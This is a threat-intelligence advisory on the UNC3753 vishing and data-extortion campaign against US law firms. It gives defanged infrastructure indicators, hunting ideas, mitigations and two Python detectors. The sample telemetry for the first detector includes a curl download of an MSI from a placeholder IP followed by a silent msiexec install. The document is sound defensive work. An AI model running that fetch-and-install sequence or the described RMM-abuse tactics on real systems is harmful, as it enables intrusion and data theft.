Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms
The financially motivated threat cluster UNC3753 is conducting a fast-paced data theft and extortion campaign against US legal and professional services. The group leverages vishing and IT helpdesk impersonation to trick targets into installing legitimate RMM and screen-sharing tools, enabling rapid data exfiltration from corporate repositories and VDI environments. Notably, the campaign also involves suspected physical intrusions where actors use USB media to steal data directly from endpoints.
- IP: 174[.]169[.]162[.]62 - Suspected UNC3753 infrastructure IP address
- IP: 192[.]236[.]146[.]173 - Suspected UNC3753 infrastructure IP address
- IP: 192[.]236[.]147[.]131 - Suspected UNC3753 infrastructure IP address
- IP: 192[.]236[.]147[.]138 - Suspected UNC3753 infrastructure IP address
- IP: 192[.]236[.]154[.]158 - Suspected UNC3753 infrastructure IP address
- IP: 193[.]141[.]60[.]212 - Suspected UNC3753 infrastructure IP address
- IP: 64[.]94[.]84[.]97 - Suspected UNC3753 infrastructure IP address
- URL: hxxps://business-data-leaks[.]com - LEAKEDDATA data leak site (DLS) used by UNC3753 for extortion
Detection / Hunter (Source: Google)
What Happened
A cybercriminal group known as UNC3753 is targeting US law firms and professional services to steal sensitive data and demand ransom payments. The attackers call employees, pretending to be IT support, and trick them into installing remote access software on their computers. This allows the hackers to quickly search for and steal confidential legal and financial documents, sometimes within a single day. In some cases, attackers have even physically entered offices posing as technicians to steal data using USB drives. Organizations should train employees to verify IT requests and strictly control physical and remote access to their networks.
Key Takeaways
- UNC3753 targets US legal and professional services using IT helpdesk impersonation and voice phishing (vishing).
- Attackers trick victims into installing legitimate RMM tools (AnyDesk, Bomgar, SuperOps) and screen-sharing utilities, so the remote access rides on signed, commercially supported software that perimeter and endpoint controls typically allow rather than on malware they would flag.
- The threat group exhibits a fast-tempo operational model, often completing data exfiltration within a single business day.
- Suspected physical intrusions involve actors posing as IT technicians to exfiltrate data directly via USB drives.
- Extortion tactics involve aggressive 3-day deadlines and threats to publish stolen data on the LEAKEDDATA leak site.
Affected Systems
- Windows
- Virtual Desktop Infrastructure (VDI)
- Bring Your Own Device (BYOD) endpoints
- iManage
- OneDrive
- SharePoint
Attack Chain
The attack begins with benign, invoice-themed emails to establish a pretext, followed by vishing calls where actors impersonate IT helpdesk staff. Targets are socially engineered into hosting screen-sharing sessions and downloading RMM tools like AnyDesk or SuperOps, often receiving links via Privnote. Once access is established, attackers pivot from BYOD endpoints to corporate VDI environments, enumerate directories, and stage sensitive documents. Finally, data is exfiltrated using tools like WinSCP, Rclone, or browser-based uploads to actor-controlled cloud storage, followed by aggressive extortion demands.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: Yes
- Platforms: Google SecOps
Google SecOps provides detection rules for this activity under the Mandiant Intel Emerging Threats rule pack, specifically targeting MSI downloads via cURL and suspected Rclone exfiltration.
Detection Engineering Assessment
- EDR Visibility: High - EDR solutions can monitor the execution of RMM tools, cURL commands downloading MSI files, and unusual file staging activity in user directories.
- Network Visibility: Medium - Network monitoring can detect high-volume SFTP/SCP/FTP transfers (WinSCP), HTTPS uploads to cloud storage APIs (Rclone, browser uploads), and connections to unauthorized file-sharing services, though legitimate RMM traffic may blend in.
- Detection Difficulty: Moderate - The heavy reliance on legitimate RMM tools, screen-sharing applications, and BYOD environments makes it challenging to distinguish malicious activity from normal IT support operations without behavioral context.
Required Log Sources
- Process Creation (Event ID 4688 / Sysmon 1)
- Network Connections (Sysmon 3)
- Firewall Logs
- Application Logs (iManage, SharePoint)
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for instances of cURL executing to download MSI files, followed immediately by msiexec execution, which may indicate RMM agent staging. | Process Creation | Execution | Low |
| Evaluate whether unusual volumes of data are being transferred over SFTP/SCP (TCP 22) or FTP by utilities like WinSCP from internal VDI nodes to external IP addresses. | Network Flow / Firewall Logs | Exfiltration | Medium |
| If you have visibility into application logs, consider hunting for rapid file searches, search-term spikes, or mass downloads in document repositories like iManage or SharePoint. | Application Logs | Collection | Medium |
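The first hunting hypothesis above (cURL fetching an MSI, then msiexec installing it on the same host) can be turned into a simple sequence detection over process-creation telemetry. The block below is an added example written for this page; it is not a Google SecOps rule and not code from the advisory. It runs over a constructed set of Sysmon Event ID 1 records whose field names mirror Sysmon (`UtcTime`, `Computer`, `User`, `Image`, `CommandLine`) but whose hostnames, user names, paths and URLs are invented; the 10-minute window and the same-file heuristic are assumptions, not values from the page.

```python
"""Sequence hunt: curl downloads a .msi, msiexec runs on the same host shortly after.

Added example for this page, not the advisory's detection logic.
Input records are constructed Sysmon Event ID 1 (process creation) events.
"""
import re
from datetime import datetime

# Constructed sample telemetry (invented hosts, users, paths and URLs).
SYSMON_EVENTS = [
    {"UtcTime": "2024-05-06 14:02:11", "Computer": "VDI-017", "User": "CORP\\jdoe",
     "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe -o C:\\Users\\jdoe\\Downloads\\agent.msi https://203.0.113.10/agent.msi"},
    {"UtcTime": "2024-05-06 14:02:19", "Computer": "VDI-017", "User": "CORP\\jdoe",
     "Image": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": "msiexec.exe /i C:\\Users\\jdoe\\Downloads\\agent.msi /qn"},
    # Benign: curl without an MSI, then a packaged deployment two hours after an MSI fetch.
    {"UtcTime": "2024-05-06 13:00:00", "Computer": "WS-221", "User": "CORP\\itops",
     "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe -O https://example.com/installer.msi"},
    {"UtcTime": "2024-05-06 14:30:00", "Computer": "WS-221", "User": "CORP\\itops",
     "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe -s https://example.com/api/health"},
    {"UtcTime": "2024-05-06 15:10:00", "Computer": "WS-221", "User": "CORP\\itops",
     "Image": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": "msiexec.exe /i \"C:\\Deploy\\7zip.msi\" /qn"},
]

# Any token ending in .msi (local path or URL) on a curl command line.
MSI_TOKEN = re.compile(r"\S+\.msi\b", re.IGNORECASE)


def _basename(path):
    """Last path component, lower-cased; works for both Windows paths and URLs."""
    return re.split(r"[\\/]", path)[-1].lower()


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def find_rmm_staging(events, window_seconds=600):
    """Return one alert per (curl .msi download, later msiexec) pair on the same host
    within window_seconds. same_file is True when the MSI name fetched by curl also
    appears on the msiexec command line, which raises confidence."""
    alerts = []
    pending = {}  # Computer -> list of (time, curl event, set of msi basenames)
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        t = _ts(ev["UtcTime"])
        host = ev["Computer"]
        image = _basename(ev["Image"])
        if image == "curl.exe":
            names = {_basename(m) for m in MSI_TOKEN.findall(ev["CommandLine"])}
            if names:
                pending.setdefault(host, []).append((t, ev, names))
        elif image == "msiexec.exe":
            for curl_time, curl_ev, names in pending.get(host, []):
                delta = (t - curl_time).total_seconds()
                if 0 <= delta <= window_seconds:
                    alerts.append({
                        "Computer": host,
                        "User": ev["User"],
                        "curl": curl_ev["CommandLine"],
                        "msiexec": ev["CommandLine"],
                        "delta_seconds": delta,
                        "same_file": any(n in ev["CommandLine"].lower() for n in names),
                    })
    return alerts


if __name__ == "__main__":
    for alert in find_rmm_staging(SYSMON_EVENTS):
        print(f"[{alert['Computer']}] {alert['User']} curl->msiexec after "
              f"{alert['delta_seconds']:.0f}s (same file: {alert['same_file']})")
```

Only the VDI-017 pair fires: the WS-221 MSI download is followed by msiexec more than two hours later, and the health-check curl never references an MSI. In production, exclude known software-deployment accounts and paths before alerting, since packaged installs through curl are a common IT workflow and the main false-positive source noted on this page.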
Control Gaps
- Lack of strict physical access controls for visitors
- Permissive BYOD policies allowing unmanaged devices to access VDI without conditional access
- Unrestricted execution of portable RMM tools and screen-sharing applications
Key Behavioral Indicators
- cURL downloading MSI files
- Execution of portable WinSCP or Rclone binaries
- Staging of sensitive files (W-2, W-9, 1099) in user Downloads or Roaming profile directories
- Use of Privnote for internal communications
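The staging indicator above (tax forms such as W-2, W-9 and 1099 landing in a user's Downloads or Roaming profile) lends itself to a file-creation burst detector. The block below is an added example for this page, not code from the advisory. It runs over constructed Sysmon Event ID 11 (FileCreate) records with Sysmon-style field names (`UtcTime`, `Computer`, `User`, `TargetFilename`) and invented values; the 15-minute window and the threshold of five files are assumptions chosen for the example.

```python
"""Burst hunt: many tax-form documents created in a user's staging directories.

Added example for this page, not the advisory's detection logic.
Input records are constructed Sysmon Event ID 11 (FileCreate) events.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample telemetry (invented hosts, users and file names).
FILE_EVENTS = [
    {"UtcTime": "2024-05-06 14:05:01", "Computer": "VDI-017", "User": "CORP\\jdoe",
     "TargetFilename": "C:\\Users\\jdoe\\Downloads\\W-2_2023_ClientA.pdf"},
    {"UtcTime": "2024-05-06 14:05:09", "Computer": "VDI-017", "User": "CORP\\jdoe",
     "TargetFilename": "C:\\Users\\jdoe\\Downloads\\W-9_ClientB.pdf"},
    {"UtcTime": "2024-05-06 14:05:40", "Computer": "VDI-017", "User": "CORP\\jdoe",
     "TargetFilename": "C:\\Users\\jdoe\\Downloads\\1099-MISC_ClientC.pdf"},
    {"UtcTime": "2024-05-06 14:06:02", "Computer": "VDI-017", "User": "CORP\\jdoe",
     "TargetFilename": "C:\\Users\\jdoe\\Downloads\\W2_ClientD.pdf"},
    {"UtcTime": "2024-05-06 14:06:30", "Computer": "VDI-017", "User": "CORP\\jdoe",
     "TargetFilename": "C:\\Users\\jdoe\\AppData\\Roaming\\1099-NEC_ClientE.pdf"},
    {"UtcTime": "2024-05-06 14:07:15", "Computer": "VDI-017", "User": "CORP\\jdoe",
     "TargetFilename": "C:\\Users\\jdoe\\Downloads\\W-9_ClientF.pdf"},
    {"UtcTime": "2024-05-06 14:07:20", "Computer": "VDI-017", "User": "CORP\\jdoe",
     "TargetFilename": "C:\\Users\\jdoe\\Downloads\\agent.msi"},
    # Benign: a single personal W-2, once outside and once inside a staging directory.
    {"UtcTime": "2024-05-06 09:00:00", "Computer": "WS-221", "User": "CORP\\itops",
     "TargetFilename": "C:\\Users\\itops\\Documents\\W-2_self.pdf"},
    {"UtcTime": "2024-05-06 09:01:00", "Computer": "WS-221", "User": "CORP\\itops",
     "TargetFilename": "C:\\Users\\itops\\Downloads\\W-2_self.pdf"},
]

# W-2 / W2 / W-9 / W9 / 1099 as a standalone token in the file name (not inside "Windows").
TAX_FORM = re.compile(r"(?<![a-z0-9])(w-?[29]|1099)(?![a-z0-9])", re.IGNORECASE)
# Downloads or AppData\Roaming under a user profile.
STAGING_DIR = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData\\Roaming)\\", re.IGNORECASE)


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def is_staged_tax_doc(path):
    """True when the file sits in a staging directory and its name looks like a tax form."""
    return bool(STAGING_DIR.search(path)) and bool(TAX_FORM.search(path.rsplit("\\", 1)[-1]))


def find_document_staging(events, threshold=5, window_seconds=900):
    """Return one alert per (host, user) whose largest burst of staged tax documents
    within window_seconds reaches threshold."""
    groups = defaultdict(list)
    for ev in events:
        if is_staged_tax_doc(ev["TargetFilename"]):
            groups[(ev["Computer"], ev["User"])].append((_ts(ev["UtcTime"]), ev["TargetFilename"]))
    alerts = []
    for (host, user), hits in groups.items():
        hits.sort()
        best = []
        for i, (start, _) in enumerate(hits):  # widest window starting at each hit
            window = [p for t, p in hits[i:] if (t - start).total_seconds() <= window_seconds]
            if len(window) > len(best):
                best = window
        if len(best) >= threshold:
            alerts.append({"Computer": host, "User": user, "count": len(best), "files": best})
    return alerts


if __name__ == "__main__":
    for alert in find_document_staging(FILE_EVENTS):
        print(f"[{alert['Computer']}] {alert['User']} staged {alert['count']} tax documents")
```

The threshold is the tuning knob: a payroll or tax practice group will legitimately touch these forms, so scope the rule to hosts or users outside those groups, or raise the threshold and pair it with the RMM-tool or WinSCP/Rclone execution indicators from the same list before paging anyone.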
False Positive Assessment
- Medium. The threat actors heavily abuse legitimate administrative tools (AnyDesk, WinSCP, cURL) and screen-sharing applications (Zoom, Teams), which are commonly used by actual IT support staff, potentially leading to false positives during behavioral hunting.
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting.
- Consider auditing corporate environments to block the installation and execution of unauthorized remote monitoring, management, and support utilities.
- Evaluate whether to disable read/write capabilities for all external USB mass storage devices via GPO or MDM.
Infrastructure Hardening
- If supported by your architecture, implement remote access conditional access policies to ensure only corporate-owned devices can authenticate to VDI or VPN.
- Consider enforcing application control policies (e.g., Windows Defender Application Control) to restrict the execution of non-approved binaries.
- Evaluate implementing strict BYOD authentication controls, requiring MFA step-up queries when accessing VDI nodes.
User Protection
- Consider implementing multi-factor authentication (MFA) on business-critical data repository applications, such as iManage.
- If applicable, restrict interactive screen-control features within authorized virtual meeting platforms like Zoom and Teams.
Security Awareness
- Consider conducting user awareness training specifically tailored to vishing and IT helpdesk impersonation tactics.
- Evaluate implementing rigid out-of-band identity verification controls for all external contractors, technical staff, and facilities visitors.
- Consider enforcing a policy requiring physical technical service personnel to be escorted by a corporate supervisor at all times.
MITRE ATT&CK Mapping
- T1566.004 - Phishing: Spearphishing Voice
- T1133 - External Remote Services
- T1204.002 - User Execution: Malicious File
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- T1569.002 - System Services: Service Execution
- T1053.005 - Scheduled Task/Job: Scheduled Task
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys
- T1036.005 - Masquerading: Match Legitimate Name or Location
- T1553.002 - Subvert Trust Controls: Code Signing
- T1562.001 - Impair Defenses: Disable or Modify Tools
- T1070.001 - Indicator Removal: Clear Windows Event Logs
- T1003.001 - OS Credential Dumping: LSASS Memory
- T1003.002 - OS Credential Dumping: Security Account Manager
- T1083 - File and Directory Discovery
- T1135 - Network Share Discovery
- T1046 - Network Service Discovery
- T1219 - Remote Access Software
- T1021.001 - Remote Services: Remote Desktop Protocol
- T1021.004 - Remote Services: SSH
- T1005 - Data from Local System
- T1572 - Protocol Tunneling
- T1020 - Automated Exfiltration
- T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage
- T1052.001 - Exfiltration Over Physical Medium
- T1486 - Data Encrypted for Impact
Additional IOCs
- Command Lines:
  - Purpose: Download and silently install SuperOps RMM agent via cURL | Tools: curl, msiexec | Stage: Execution